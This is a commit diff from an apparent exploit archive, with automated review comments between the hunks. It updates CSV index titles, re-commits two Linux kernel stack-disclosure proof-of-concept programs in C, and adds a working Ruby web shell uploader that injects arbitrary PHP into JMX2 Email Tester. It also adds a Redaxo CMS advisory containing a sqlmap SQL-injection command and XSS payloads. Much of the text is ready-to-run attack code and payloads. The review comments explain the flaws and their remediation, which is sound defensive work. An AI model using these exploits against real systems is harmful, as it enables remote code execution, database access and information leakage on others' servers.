DB: 2016-02-18
2 new exploits
parent cc8580757a
commit 207c9bac9b
5 changed files with 391 additions and 274 deletions
files.csv (16 lines changed)

@ -8825,7 +8825,7 @@ id,file,description,date,author,platform,type,port
9349,platforms/php/webapps/9349.txt,"Discloser 0.0.4-rc2 (index.php more) SQL Injection Vulnerability",2009-08-03,"Salvatore Fresta",php,webapps,0
9350,platforms/php/webapps/9350.txt,"MAXcms 3.11.20b RFI / File Disclosure Vulnerabilities",2009-08-03,GoLd_M,php,webapps,0
9351,platforms/php/webapps/9351.txt,"Payment Processor Script (shop.htm cid) SQL Injection Vulnerability",2009-08-03,ZoRLu,php,webapps,0
9352,platforms/linux/local/9352.c,"Linux Kernel <= 2.6.31-rc5 sigaltstack 4-Byte Stack Disclosure Exploit",2009-08-04,"Jon Oberheide",linux,local,0
9352,platforms/linux/local/9352.c,"Linux Kernel <= 2.6.31-rc5 - sigaltstack 4-Byte Stack Disclosure Exploit",2009-08-04,"Jon Oberheide",linux,local,0
9353,platforms/php/webapps/9353.txt,"MOC Designs PHP News 1.1 (Auth Bypass) SQL Injection Vulnerability",2009-08-04,SirGod,php,webapps,0
9354,platforms/windows/local/9354.pl,"MediaCoder 0.7.1.4486 - (.lst) Universal Buffer Overflow Exploit (SEH)",2009-08-04,germaya_x,windows,local,0
9355,platforms/php/webapps/9355.txt,"elgg <= 1.5 (/_css/js.php) Local File Inclusion Vulnerability",2009-08-04,eLwaux,php,webapps,0
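Review bot: this hunk only rewrites the 9352 title to insert " - " between the kernel version and the component name, matching the `Product Version - Detail` convention that rows such as 9354 already follow. The same normalisation is applied to 9513, 9521 and 15150 in the hunks below, yet none of it is reflected in the commit message "DB: 2016-02-18 / 2 new exploits"; a one-line mention of the title cleanups, or a separate commit for them, would keep the CSV history searchable.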

@ -8978,7 +8978,7 @@ id,file,description,date,author,platform,type,port
9510,platforms/php/webapps/9510.txt,"Joomla Component com_siirler 1.2 (sid) SQL Injection Vulnerability",2009-08-25,v3n0m,php,webapps,0
9511,platforms/php/webapps/9511.txt,"Turnkey Arcade Script (id) Remote SQL Injection Vulnerability",2009-08-25,Red-D3v1L,php,webapps,0
9512,platforms/php/webapps/9512.txt,"TCPDB 3.8 - Remote Content Change Bypass Vulnerabilities",2009-08-25,Securitylab.ir,php,webapps,0
9513,platforms/linux/local/9513.c,"Linux Kernel <= 2.6.31-rc7 AF_LLC getsockname 5-Byte Stack Disclosure",2009-08-25,"Jon Oberheide",linux,local,0
9513,platforms/linux/local/9513.c,"Linux Kernel <= 2.6.31-rc7 - AF_LLC getsockname 5-Byte Stack Disclosure",2009-08-25,"Jon Oberheide",linux,local,0
9514,platforms/hardware/dos/9514.py,"Xerox WorkCentre Multiple Models Denial of Service Exploit",2009-08-25,"Henri Lindberg",hardware,dos,0
9515,platforms/windows/dos/9515.txt,"Cerberus FTP 3.0.1 (ALLO) Remote Overflow DoS Exploit (meta)",2009-08-25,"Francis Provencher",windows,dos,0
9516,platforms/windows/dos/9516.txt,"Novell Client for Windows 2000/XP ActiveX Remote DoS Vulnerability",2009-08-25,"Francis Provencher",windows,dos,0

@ -8986,7 +8986,7 @@ id,file,description,date,author,platform,type,port
9518,platforms/php/webapps/9518.txt,"EMO Breader Manager (video.php movie) SQL Injection Vulnerability",2009-08-25,Mr.SQL,php,webapps,0
9519,platforms/windows/local/9519.pl,"ProShow Producer / Gold 4.0.2549 - (.psh) Universal BoF Exploit (SEH)",2009-08-25,hack4love,windows,local,0
9520,platforms/multiple/local/9520.txt,"HyperVM File Permissions Local Vulnerability",2009-08-25,"Xia Shing Zee",multiple,local,0
9521,platforms/linux/local/9521.c,"Linux Kernel <= 2.6.30 atalk_getname() 8-bytes Stack Disclosure Exploit",2009-08-26,"Clément Lecigne",linux,local,0
9521,platforms/linux/local/9521.c,"Linux Kernel <= 2.6.30 - atalk_getname() 8-bytes Stack Disclosure Exploit",2009-08-26,"Clément Lecigne",linux,local,0
9522,platforms/php/webapps/9522.txt,"Moa Gallery <= 1.2.0 - Multiple Remote File Inclusion Vulnerabilities",2009-08-26,"cr4wl3r ",php,webapps,0
9523,platforms/php/webapps/9523.txt,"Moa Gallery 1.2.0 (index.php action) SQL Injection Vulnerability",2009-08-26,Mr.SQL,php,webapps,0
9524,platforms/php/webapps/9524.txt,"totalcalendar 2.4 (bsql/lfi) Multiple Vulnerabilities",2009-08-26,Moudi,php,webapps,0

@ -13186,7 +13186,7 @@ id,file,description,date,author,platform,type,port
15146,platforms/php/webapps/15146.txt,"Achievo 1.4.3 - CSRF Vulnerability",2010-09-28,"Pablo Milano",php,webapps,0
15147,platforms/php/webapps/15147.txt,"Micro CMS 1.0 b1 - Persistent XSS Vulnerability",2010-09-28,"SecPod Research",php,webapps,0
15148,platforms/windows/dos/15148.txt,"Microsoft Excel - SxView Record Parsing Heap Memory Corruption",2010-09-29,Abysssec,windows,dos,0
15150,platforms/linux/local/15150.c,"Linux Kernel < 2.6.36-rc6 pktcdvd Kernel Memory Disclosure",2010-09-29,"Jon Oberheide",linux,local,0
15150,platforms/linux/local/15150.c,"Linux Kernel < 2.6.36-rc6 - pktcdvd Kernel Memory Disclosure",2010-09-29,"Jon Oberheide",linux,local,0
15151,platforms/php/webapps/15151.txt,"Webspell 4.2.1 asearch.php SQL Injection Vulnerability",2010-09-29,"silent vapor",php,webapps,0
15152,platforms/php/webapps/15152.py,"Webspell wCMS-Clanscript4.01.02net<= static&static Blind SQL Injection Vulnerability",2010-09-29,"Easy Laster",php,webapps,0
15153,platforms/php/webapps/15153.txt,"Webspell 4.x - safe_query Bypass Vulnerability",2010-09-29,"silent vapor",php,webapps,0

@ -18363,8 +18363,8 @@ id,file,description,date,author,platform,type,port
21068,platforms/cgi/remote/21068.txt,"SIX-webboard 2.01 File Retrieval Vulnerability",2001-08-31,"Hannibal Lector",cgi,remote,0
21069,platforms/windows/local/21069.c,"Microsoft Windows 2000 RunAs Service Named Pipe Hijacking Vulnerability",2001-12-11,Camisade,windows,local,0
21070,platforms/osx/local/21070.txt,"Apple Open Firmware 4.1.7/4.1.8 Insecure Password Vulnerability",2001-08-15,"Macintosh Security",osx,local,0
21071,platforms/windows/local/21071.c,"Microsoft IIS 4/5 - SSI Buffer Overrun Privelege Elevation",2001-08-15,Indigo,windows,local,0
21072,platforms/windows/local/21072.txt,"Microsoft IIS 5.0 - In-Process Table Privelege Elevation Vulnerability",2001-08-15,"Digital Offense",windows,local,0
21071,platforms/windows/local/21071.c,"Microsoft IIS 4/5 - SSI Buffer Overrun Privilege Elevation",2001-08-15,Indigo,windows,local,0
21072,platforms/windows/local/21072.txt,"Microsoft IIS 5.0 - In-Process Table Privilege Elevation Vulnerability",2001-08-15,"Digital Offense",windows,local,0
21073,platforms/unix/local/21073.txt,"Jakarta Tomcat 3.x/4.0 Error Message Information Disclosure Vulnerability",2001-08-16,LoWNOISE,unix,local,0
21074,platforms/unix/dos/21074.pl,"glFTPD 1.x LIST Denial of Service Vulnerability",2001-08-17,"ASGUARD LABS",unix,dos,0
21075,platforms/linux/remote/21075.txt,"SuSE 6.3/6.4/7.0 sdb Arbitrary Command Execution Vulnerability",2001-08-02,"Maurycy Prodeus ",linux,remote,0
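Review bot: the "Privelege" to "Privilege" correction on rows 21071 and 21072 is right, and the same misspelling in row 32440 is picked up in the next hunk, but a spelling pass like this should be shown to be exhaustive: a single `grep -n Privelege files.csv` run before committing, with its empty result noted in the message, is cheaper than a follow-up commit if another row was missed.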

@ -29228,7 +29228,7 @@ id,file,description,date,author,platform,type,port
32437,platforms/php/webapps/32437.txt,"LifeSize UVC 1.2.6 - Authenticated RCE Vulnerabilities",2014-03-22,"Brandon Perry",php,webapps,0
32438,platforms/windows/remote/32438.rb,"Microsoft Internet Explorer - TextRange Use-After-Free (MS14-012)",2014-03-22,metasploit,windows,remote,0
32439,platforms/php/remote/32439.rb,"Horde Framework Unserialize PHP Code Execution",2014-03-22,metasploit,php,remote,80
32440,platforms/hardware/remote/32440.rb,"Array Networks vAPV and vxAG - Private Key Privelege Escalation Code Execution",2014-03-22,metasploit,hardware,remote,22
32440,platforms/hardware/remote/32440.rb,"Array Networks vAPV and vxAG - Private Key Privilege Escalation Code Execution",2014-03-22,metasploit,hardware,remote,22
32441,platforms/php/webapps/32441.txt,"PHPJabbers Post Comments 3.0 Cookie Authentication Bypass Vulnerability",2008-09-29,Crackers_Child,php,webapps,0
32442,platforms/windows/remote/32442.c,"Nokia PC Suite <= 7.0 - Remote Buffer Overflow Vulnerability",2008-09-29,Ciph3r,windows,remote,0
32443,platforms/php/webapps/32443.txt,"CAcert 'analyse.php' Cross-Site Scripting Vulnerability",2008-09-29,"Alexander Klink",php,webapps,0

@ -35694,3 +35694,5 @@ id,file,description,date,author,platform,type,port
39452,platforms/windows/dos/39452.txt,"CyberCop Scanner Smbgrind 5.5 - Buffer Overflow",2016-02-16,hyp3rlinx,windows,dos,0
39453,platforms/php/webapps/39453.txt,"phpMyBackupPro 2.5 - Remote Command Execution / CSRF",2016-02-16,hyp3rlinx,php,webapps,0
39454,platforms/linux/dos/39454.txt,"glibc - getaddrinfo Stack-Based Buffer Overflow",2016-02-16,"Google Security Research",linux,dos,0
39456,platforms/multiple/webapps/39456.rb,"JMX2 Email Tester - (save_email.php) Web Shell Upload",2016-02-17,HaHwul,multiple,webapps,0
39459,platforms/php/webapps/39459.txt,"Redaxo CMS 5.0.0 - Multiple Vulnerabilities",2016-02-17,"LSE Leading Security Experts GmbH",php,webapps,80
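Review bot: the two new rows classify comparable targets differently: 39456, whose target is a PHP script (`save_email.php`, per the exploit header further down), is filed as platform `multiple` with port 0, while 39459, also a PHP web application, is `php` with port 80, and every other php/webapps row touched by this commit uses port 0. Either choice is defensible on its own, but one rule (platform = language of the vulnerable code, port only when the entry depends on a fixed one) would keep the `platform` and `port` columns usable as filters; note also that the 39459 advisory's own PoC URLs are https, so 80 is not the port the researcher tested against.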

platforms/linux/local/9352.c

@ -1,121 +1,121 @@
/*
* sigaltstack-leak.c
*
* Linux Kernel <= 2.6.31-rc5 sigaltstack 4-Byte Stack Disclosure
* Jon Oberheide <jon@oberheide.org>
* http://jon.oberheide.org
*
* Information:
*
* http://git.kernel.org/linus/0083fc2c50e6c5127c2802ad323adf8143ab7856
*
* Ulrich Drepper correctly points out that there is generally padding in
* the structure on 64-bit hosts, and that copying the structure from
* kernel to user space can leak information from the kernel stack in those
* padding bytes.
*
* Notes:
*
* Only 4 bytes of uninitialized kernel stack are leaked in the padding
* between stack_t's ss_flags and ss_size. The disclosure only affects
* affects 64-bit hosts.
*/

#include <stdio.h>
#include <stddef.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <unistd.h>
#include <time.h>
#include <sys/syscall.h>
#include <sys/types.h>

const int randcalls[] = {
0, 1, 2, 3, 4, 5, 6, 8, 9, 10, 11, 13, 14, 16,
21, 22, 24, 25, 32, 33, 36, 37, 38, 39, 72, 73,
78, 79, 96, 97, 97, 102, 104, 105, 106, 107, 108,
109, 110, 11, 112, 113, 114, 116, 117, 118, 119,
120, 121, 121, 123, 124, 125, 140, 141, 143, 146
};

void
dump(const unsigned char *p, unsigned l)
{
printf("stack_t:");
while (l > 0) {
printf(" ");
if (l == 12) {
printf("*** ");
}
printf("%02x", *p);
if (l == 9) {
printf(" ***");
}
++p; --l;
}
printf("\n");
}

int
main(void)
{
char *p;
int call, ret;
size_t size, ftest, stest;
stack_t oss;

size = sizeof(stack_t);

printf("[+] Checking platform...\n");

if (size == 24) {
printf("[+] sizeof(stack_t) = %zu\n", size);
printf("[+] Correct size, 64-bit platform.\n");
} else {
printf("[-] sizeof(stack_t) = %zu\n", size);
printf("[-] Error: you do not appear to be on a 64-bit platform.\n");
printf("[-] No information disclosure is possible.\n");
exit(1);
}

ftest = offsetof(stack_t, ss_flags) + sizeof(oss.ss_flags);
stest = offsetof(stack_t, ss_size);

printf("[+] Checking for stack_t hole...\n");

if (ftest != stest) {
printf("[+] ss_flags end (%zu) != ss_size start (%zu)\n", ftest, stest);
printf("[+] Hole in stack_t present!\n", ftest, stest);
} else {
printf("[-] ss_flags end (%zu) == ss_size start (%zu)\n", ftest, stest);
printf("[-] Error: No hole in stack_t, something is quite wrong.\n");
exit(1);
}

printf("[+] Ready to call sigaltstack.\n\n");

for (ret = 5; ret > 0; ret--) {
printf("%d...\n", ret);
sleep(1);
}
srand(time(NULL));

while (1) {
/* random stuff to make stack pseudo-interesting */
call = rand() % (sizeof(randcalls) / sizeof(int));
syscall(randcalls[call]);

ret = sigaltstack(NULL, &oss);
if (ret != 0) {
printf("[-] Error: sigaltstack failed.\n");
exit(1);
}

dump((unsigned char *) &oss, sizeof(oss));
}

return 0;
}

// milw0rm.com [2009-08-04]
/*
* sigaltstack-leak.c
*
* Linux Kernel <= 2.6.31-rc5 sigaltstack 4-Byte Stack Disclosure
* Jon Oberheide <jon@oberheide.org>
* http://jon.oberheide.org
*
* Information:
*
* http://git.kernel.org/linus/0083fc2c50e6c5127c2802ad323adf8143ab7856
*
* Ulrich Drepper correctly points out that there is generally padding in
* the structure on 64-bit hosts, and that copying the structure from
* kernel to user space can leak information from the kernel stack in those
* padding bytes.
*
* Notes:
*
* Only 4 bytes of uninitialized kernel stack are leaked in the padding
* between stack_t's ss_flags and ss_size. The disclosure only affects
* affects 64-bit hosts.
*/

#include <stdio.h>
#include <stddef.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <unistd.h>
#include <time.h>
#include <sys/syscall.h>
#include <sys/types.h>

const int randcalls[] = {
0, 1, 2, 3, 4, 5, 6, 8, 9, 10, 11, 13, 14, 16,
21, 22, 24, 25, 32, 33, 36, 37, 38, 39, 72, 73,
78, 79, 96, 97, 97, 102, 104, 105, 106, 107, 108,
109, 110, 11, 112, 113, 114, 116, 117, 118, 119,
120, 121, 121, 123, 124, 125, 140, 141, 143, 146
};

void
dump(const unsigned char *p, unsigned l)
{
printf("stack_t:");
while (l > 0) {
printf(" ");
if (l == 12) {
printf("*** ");
}
printf("%02x", *p);
if (l == 9) {
printf(" ***");
}
++p; --l;
}
printf("\n");
}

int
main(void)
{
char *p;
int call, ret;
size_t size, ftest, stest;
stack_t oss;

size = sizeof(stack_t);

printf("[+] Checking platform...\n");

if (size == 24) {
printf("[+] sizeof(stack_t) = %zu\n", size);
printf("[+] Correct size, 64-bit platform.\n");
} else {
printf("[-] sizeof(stack_t) = %zu\n", size);
printf("[-] Error: you do not appear to be on a 64-bit platform.\n");
printf("[-] No information disclosure is possible.\n");
exit(1);
}

ftest = offsetof(stack_t, ss_flags) + sizeof(oss.ss_flags);
stest = offsetof(stack_t, ss_size);

printf("[+] Checking for stack_t hole...\n");

if (ftest != stest) {
printf("[+] ss_flags end (%zu) != ss_size start (%zu)\n", ftest, stest);
printf("[+] Hole in stack_t present!\n", ftest, stest);
} else {
printf("[-] ss_flags end (%zu) == ss_size start (%zu)\n", ftest, stest);
printf("[-] Error: No hole in stack_t, something is quite wrong.\n");
exit(1);
}

printf("[+] Ready to call sigaltstack.\n\n");

for (ret = 5; ret > 0; ret--) {
printf("%d...\n", ret);
sleep(1);
}
srand(time(NULL));

while (1) {
/* random stuff to make stack pseudo-interesting */
call = rand() % (sizeof(randcalls) / sizeof(int));
syscall(randcalls[call]);

ret = sigaltstack(NULL, &oss);
if (ret != 0) {
printf("[-] Error: sigaltstack failed.\n");
exit(1);
}

dump((unsigned char *) &oss, sizeof(oss));
}

return 0;
}

// milw0rm.com [2009-08-04]
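Review bot: the removed and added sides of this 121-line hunk render identically, so the change is a whitespace or line-ending normalisation of an archived exploit rather than a code change; it is not mentioned in the commit message and it resets `git blame` for the whole file, so either describe it or leave archived files byte-for-byte as submitted. Since the whole file is on view: `randcalls` contains `11` where the surrounding sequence suggests `111` and repeats `97` and `121`; `printf("[+] Hole in stack_t present!\n", ftest, stest)` passes two arguments the format never consumes; and `char *p` in `main` is unused. None of that affects the PoC, but all of it is flagged under `-Wall`. The header's quotation from the linked kernel commit is the general defensive lesson: any structure handed to `copy_to_user` must be zero-initialised first (`memset` or `= {0}`), because the 4 bytes of compiler padding between `ss_flags` (an int) and `ss_size` (a size_t) on 64-bit builds are otherwise whatever the kernel stack last held, which is exactly what the `ftest != stest` check here detects.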

platforms/linux/local/9513.c

@ -1,146 +1,146 @@
/*
* llc-getsockname-leak.c
*
* Linux Kernel <= 2.6.31-rc7 AF_LLC getsockname 5-Byte Stack Disclosure
* Jon Oberheide <jon@oberheide.org>
* http://jon.oberheide.org
*
* Information:
*
* http://git.kernel.org/linus/28e9fc592cb8c7a43e4d3147b38be6032a0e81bc
*
* sllc_arphrd member of sockaddr_llc might not be changed. Zero sllc
* before copying to the above layer's structure.
*
* Notes:
*
* Bug is present in <= 2.6.31-rc7, but the impact is limited to <= 2.6.24.4
* as AF_LLC sockets have been restricted to CAP_NET_RAW since then. Only 5
* bytes of uninitialized kernel stack are leaked via AF_LLC's getsockname().
*/

#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <errno.h>
#include <unistd.h>
#include <time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <net/if_arp.h>

#ifndef AF_LLC
#define AF_LLC 26
#endif

#ifndef AF_LLC
#define AF_LLC 26
#endif

#ifndef LLC_SAP_NULL
#define LLC_SAP_NULL 0x00
#endif

#ifndef __LLC_SOCK_SIZE__
#define __LLC_SOCK_SIZE__ 16
struct sockaddr_llc {
sa_family_t sllc_family;
sa_family_t sllc_arphrd;
unsigned char sllc_test;
unsigned char sllc_xid;
unsigned char sllc_ua;
unsigned char sllc_sap;
unsigned char sllc_mac[6];
unsigned char __pad[__LLC_SOCK_SIZE__ - sizeof(sa_family_t) * 2 -
sizeof(unsigned char) * 4 - 6];
};
#endif

const int randcalls[] = {
__NR_read, __NR_write, __NR_open, __NR_close, __NR_stat, __NR_lstat,
__NR_lseek, __NR_rt_sigaction, __NR_rt_sigprocmask, __NR_ioctl,
__NR_access, __NR_pipe, __NR_sched_yield, __NR_mremap, __NR_dup,
__NR_dup2, __NR_getitimer, __NR_setitimer, __NR_getpid, __NR_fcntl,
__NR_flock, __NR_getdents, __NR_getcwd, __NR_gettimeofday,
__NR_getrlimit, __NR_getuid, __NR_getgid, __NR_geteuid, __NR_getegid,
__NR_getppid, __NR_getpgrp, __NR_getgroups, __NR_getresuid,
__NR_getresgid, __NR_getpgid, __NR_getsid,__NR_getpriority,
__NR_sched_getparam, __NR_sched_get_priority_max
};

void
dump(const unsigned char *p, unsigned l)
{
printf("sockaddr_llc:");
while (l > 0) {
printf(" ");
if (l == 12 || l == 2) {
printf("*** ");
}
printf("%02x", *p);
if (l == 10 || l == 1) {
printf(" ***");
}
++p; --l;
}
printf("\n");
}

int
main(void)
{
struct sockaddr_llc sllc;
int ret, sock, call, sllc_len = sizeof(sllc);

printf("[+] Creating AF_LLC socket.\n");

sock = socket(AF_LLC, SOCK_DGRAM, 0);
if (sock == -1) {
printf("[-] Error: Couldn't create AF_LLC socket.\n");
printf("[-] %s.\n", strerror(errno));
exit(1);
}

memset(&sllc, 0, sllc_len);

sllc.sllc_family = AF_LLC;
sllc.sllc_arphrd = ARPHRD_ETHER;
sllc.sllc_sap = LLC_SAP_NULL;

printf("[+] Dummy sendto to autobind socket.\n");

ret = sendto(sock, "LEAK", 4, 0, (struct sockaddr *) &sllc, sllc_len);
if (ret == -1) {
printf("[-] Error: sendto failed.\n");
printf("[-] %s.\n", strerror(errno));
exit(1);
}

printf("[+] Ready to call getsockname.\n\n");

for (ret = 5; ret > 0; ret--) {
printf("%d...\n", ret);
sleep(1);
}
srand(time(NULL));

while (1) {
/* random stuff to make stack pseudo-interesting */
call = rand() % (sizeof(randcalls) / sizeof(int));
syscall(randcalls[call]);

ret = getsockname(sock, (struct sockaddr *) &sllc, &sllc_len);
if (ret != 0) {
printf("[-] Error: getsockname failed.\n");
printf("[-] %s.\n", strerror(errno));
exit(1);
}

dump((unsigned char *) &sllc, sizeof(sllc));
}

return 0;
}

// milw0rm.com [2009-08-25]
/*
* llc-getsockname-leak.c
*
* Linux Kernel <= 2.6.31-rc7 AF_LLC getsockname 5-Byte Stack Disclosure
* Jon Oberheide <jon@oberheide.org>
* http://jon.oberheide.org
*
* Information:
*
* http://git.kernel.org/linus/28e9fc592cb8c7a43e4d3147b38be6032a0e81bc
*
* sllc_arphrd member of sockaddr_llc might not be changed. Zero sllc
* before copying to the above layer's structure.
*
* Notes:
*
* Bug is present in <= 2.6.31-rc7, but the impact is limited to <= 2.6.24.4
* as AF_LLC sockets have been restricted to CAP_NET_RAW since then. Only 5
* bytes of uninitialized kernel stack are leaked via AF_LLC's getsockname().
*/

#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <errno.h>
#include <unistd.h>
#include <time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <net/if_arp.h>

#ifndef AF_LLC
#define AF_LLC 26
#endif

#ifndef AF_LLC
#define AF_LLC 26
#endif

#ifndef LLC_SAP_NULL
#define LLC_SAP_NULL 0x00
#endif

#ifndef __LLC_SOCK_SIZE__
#define __LLC_SOCK_SIZE__ 16
struct sockaddr_llc {
sa_family_t sllc_family;
sa_family_t sllc_arphrd;
unsigned char sllc_test;
unsigned char sllc_xid;
unsigned char sllc_ua;
unsigned char sllc_sap;
unsigned char sllc_mac[6];
unsigned char __pad[__LLC_SOCK_SIZE__ - sizeof(sa_family_t) * 2 -
sizeof(unsigned char) * 4 - 6];
};
#endif

const int randcalls[] = {
__NR_read, __NR_write, __NR_open, __NR_close, __NR_stat, __NR_lstat,
__NR_lseek, __NR_rt_sigaction, __NR_rt_sigprocmask, __NR_ioctl,
__NR_access, __NR_pipe, __NR_sched_yield, __NR_mremap, __NR_dup,
__NR_dup2, __NR_getitimer, __NR_setitimer, __NR_getpid, __NR_fcntl,
__NR_flock, __NR_getdents, __NR_getcwd, __NR_gettimeofday,
__NR_getrlimit, __NR_getuid, __NR_getgid, __NR_geteuid, __NR_getegid,
__NR_getppid, __NR_getpgrp, __NR_getgroups, __NR_getresuid,
__NR_getresgid, __NR_getpgid, __NR_getsid,__NR_getpriority,
__NR_sched_getparam, __NR_sched_get_priority_max
};

void
dump(const unsigned char *p, unsigned l)
{
printf("sockaddr_llc:");
while (l > 0) {
printf(" ");
if (l == 12 || l == 2) {
printf("*** ");
}
printf("%02x", *p);
if (l == 10 || l == 1) {
printf(" ***");
}
++p; --l;
}
printf("\n");
}

int
main(void)
{
struct sockaddr_llc sllc;
int ret, sock, call, sllc_len = sizeof(sllc);

printf("[+] Creating AF_LLC socket.\n");

sock = socket(AF_LLC, SOCK_DGRAM, 0);
if (sock == -1) {
printf("[-] Error: Couldn't create AF_LLC socket.\n");
printf("[-] %s.\n", strerror(errno));
exit(1);
}

memset(&sllc, 0, sllc_len);

sllc.sllc_family = AF_LLC;
sllc.sllc_arphrd = ARPHRD_ETHER;
sllc.sllc_sap = LLC_SAP_NULL;

printf("[+] Dummy sendto to autobind socket.\n");

ret = sendto(sock, "LEAK", 4, 0, (struct sockaddr *) &sllc, sllc_len);
if (ret == -1) {
printf("[-] Error: sendto failed.\n");
printf("[-] %s.\n", strerror(errno));
exit(1);
}

printf("[+] Ready to call getsockname.\n\n");

for (ret = 5; ret > 0; ret--) {
printf("%d...\n", ret);
sleep(1);
}
srand(time(NULL));

while (1) {
/* random stuff to make stack pseudo-interesting */
call = rand() % (sizeof(randcalls) / sizeof(int));
syscall(randcalls[call]);

ret = getsockname(sock, (struct sockaddr *) &sllc, &sllc_len);
if (ret != 0) {
printf("[-] Error: getsockname failed.\n");
printf("[-] %s.\n", strerror(errno));
exit(1);
}

dump((unsigned char *) &sllc, sizeof(sllc));
}

return 0;
}

// milw0rm.com [2009-08-25]
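Review bot: same pattern as the previous file: 146 identical lines on both sides of the hunk, so a whitespace-only rewrite of an archived exploit that the commit message does not mention. Pre-existing issues visible in the hunk, left as they were: the `#ifndef AF_LLC / #define AF_LLC 26 / #endif` block appears twice in succession (the second is a no-op), and `sllc_len` is declared `int` but its address is passed to `getsockname()`, whose last parameter is `socklen_t *`, which current GCC reports as an incompatible pointer type. The header's own note is the defensive point worth keeping: the kernel bug (an unzeroed `sockaddr_llc` copied to user space, fixed by the linked commit 28e9fc592cb8) survived until 2.6.31-rc7, but restricting AF_LLC socket creation to `CAP_NET_RAW` from 2.6.24.4 onward removed unprivileged reachability and with it most of the impact, a clean example of capability gating containing an information leak before the root cause is fixed.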

platforms/multiple/webapps/39456.rb (45 lines changed, executable file)

@ -0,0 +1,45 @@
# Exploit Title: JMX2 Email Tester - Web Shell Upload(save_email.php)
# Date: 2016-02-15
# Blog: http://www.hahwul.com
# Vendor Homepage: https://github.com/johnfmorton/jmx2-Email-Tester
# Software Link: https://github.com/johnfmorton/jmx2-Email-Tester/archive/master.zip
# Tested on: debian [wheezy]
# CVE : none

require "net/http"
require "uri"
require 'uri-handler'

if ARGV.length != 2

puts "JMX2 Email Tester Web Shell Uploader"
puts "Usage: #>ruby jmx2Email_exploit.rb [targetURL] [phpCode]"
puts " targetURL(ex): http://127.0.0.1/vul_test/jmx2-Email-Tester"
puts " phpCode(ex): echo 'zzzzz'"
puts " Example : ~~.rb http://127.0.0.1/vul_test/jmx2-Email-Tester/emailTester 'echo zzzz'"
puts " Install GEM: #> gem install uri-handler"
puts " exploit & code by hahwul[www.hahwul.com]"
else
target_url = ARGV[0] # http://127.0.0.1/jmx2-Email-Tester/
shell = ARGV[1] # PHP Code
shell = shell.to_uri
exp_url = target_url + "/models/save_email.php"
puts shell
uri = URI.parse(exp_url)
http = Net::HTTP.new(uri.host, uri.port)
puts exp_url
request = Net::HTTP::Post.new(uri.request_uri)
request["Accept-Encoding"] = "gzip, deflate"
request["Referer"] = "http://127.0.0.1/vul_test/jmx2-Email-Tester/emailTester/"
request["User-Agent"] = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0"
request["Accept"] = "application/json, text/javascript, */*; q=0.01"
request["Content-Type"] = "application/x-www-form-urlencoded; charset=UTF-8"
request["Connection"] = "keep-alive"
request.set_form_data({"orgfilename"=>"test-email-1455499197-org.html","thecontent"=>"%3Chtml%3E%0A%20%20%20%3C%3Fphp%20%0A#{shell}%0A%3F%3E%0A%3C%2Fhtml%3E","inlinefilename"=>"test-email-1455499197-inline.php"})
response = http.request(request)

puts "[Result] Status code: "+response.code
puts "[Result] Open Browser: "+target_url+"/_saved_email_files/test-email-1455499197-inline.php"
end

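Review bot: the header carries no affected version of JMX2 Email Tester and `Tested on` names only the operating system, so the CSV row above cannot record a version either; since the software link is a GitHub `master.zip`, the commit or date of the snapshot that was tested should be noted or the entry becomes unreproducible as soon as the repository moves on. The weakness the script relies on is readable from the form fields it posts: `models/save_email.php` accepts `thecontent` together with a caller-supplied `inlinefilename` and the result is then served from the web-reachable `_saved_email_files/` directory, with nothing in the request suggesting an extension or content check. On the application side the remediation is to generate the file name server-side, allow-list the extension (`.html` only), store the saved files outside the document root or serve that directory with script execution disabled, and put authentication in front of what is a developer testing tool; a deployment note recommending that the tester not ship to production would cover the rest.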

platforms/php/webapps/39459.txt (70 lines changed, executable file)

@ -0,0 +1,70 @@
=== LSE Leading Security Experts GmbH - Security Advisory 2016-01-18 ===

Redaxo CMS contains multiple vulnerabilities
-------------------------------------------------------------

Problem Overview
================
Technical Risk: high
Likelihood of Exploitation: medium
Vendor: https://www.redaxo.org/
Tested version: Redaxo CMS v5.0.0
Credits: LSE Leading Security Experts GmbH employee Tim Herres
Advisory URL: https://www.lsexperts.de/advisories/lse-2016-01-18.txt
Advisory Status: Public
CVE-Number: na

Impact
======
Redaxo is an easy to use open source content management system. A user can create his own website using the Redaxo CMS.
During internal research, multiple vulnerabilities were identified in the Redaxo CMS software.
The software is vulnerable to an SQL-Injection attack, allowing an authenticated user to access the database in an unsafe way.
Some parts of the application do not have sufficient input validation and output encoding. This means user supplied input is inserted in an unsafe way
resulting in a Cross Site Scripting vulnerability.

Issue Description
=================
The following vulnerabilities are only examples. It is highly recommended to check the whole application for similar vulnerabilities.
1) SQL Injection in the "Mediapool" component:
Authentication required: yes
User needs access to the "Mediapool".

POC:
Exploitation using SQL Map
sqlmap -u "https://127.0.0.1/redaxo/index.php?page=mediapool%2fmedia&rex_file_category=0&media_name=blub&undefined=%0d" --cookie="PHPSESSID=h9s74l660iongtg71bpkjup0d1" -p media_name

Parameter: media_name (GET)
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: page=mediapool/media&rex_file_category=0&media_name=test');(SELECT * FROM (SELECT(SLEEP(5)))jbWV)#&undefined=

2) Reflected XSS
Authentication required: yes
Used browser: FF42
Example:
https://127.0.0.1/redaxo/index.php?page=mediapool/media&info=Datei+tot.<script>alert("xss");</script>&opener_input_field=

3) Stored XSS (persistent XSS)
Authentication required: yes
Used browser: FF42
It is possible to store JavaScript Code in input fields.
Example:
Menu --> "Mediapool" --> "Media Category Managing" --> Add --> Name field
Payload:<script>alert("xss")</script>
Response:
[...]
[...]href="index.php?page=mediapool/structure&cat_id=801"><script>alert("xss");</script></a></li></ol></div><section class="rex-page-sectio
[...]


Temporary Workaround and Fix
============================
Update to Version 5.0.1

History
=======
2016-01-18 Issues discovered
2016-01-29 Vendor contacted
2016-02-05 Vendor confirmed
2016-02-09 Vendor released patch
2016-02-16 Advisory released